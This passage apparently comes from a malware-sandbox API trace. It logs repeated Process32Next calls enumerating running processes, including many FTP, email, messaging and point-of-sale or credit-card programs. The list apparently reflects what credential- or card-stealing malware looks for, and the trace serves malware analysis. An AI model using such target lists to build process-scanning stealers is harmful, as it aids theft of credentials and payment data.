cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.779] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.782] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.784] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.787] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.789] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.791] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0147.793] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.795] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0147.798] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.800] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0147.802] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0147.804] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0147.806] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0147.809] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0147.815] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0147.817] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.819] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0147.822] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0147.824] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.825] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0147.827] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.830] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.832] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.834] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.836] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0147.838] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0147.841] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0147.844] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0147.845] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0147.847] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0147.848] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0147.853] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0147.855] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0147.857] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0147.859] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0147.860] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0147.862] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0147.864] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0147.865] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0147.867] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0147.869] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0147.870] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0147.872] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0147.874] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0147.877] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0147.879] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0147.880] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0147.882] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0147.885] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0147.887] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0147.891] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0147.893] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0147.895] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0147.898] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0147.900] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0147.902] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0147.904] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0147.913] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0147.916] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0147.918] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0147.920] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0147.922] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0147.924] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0147.926] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0147.928] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0147.930] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0147.932] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0147.934] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0147.938] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0147.939] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0147.941] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0147.943] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0147.946] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0147.948] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0147.950] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0147.952] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0147.954] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0147.956] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0147.958] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0147.960] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0147.961] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0147.963] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0147.965] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0147.967] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: 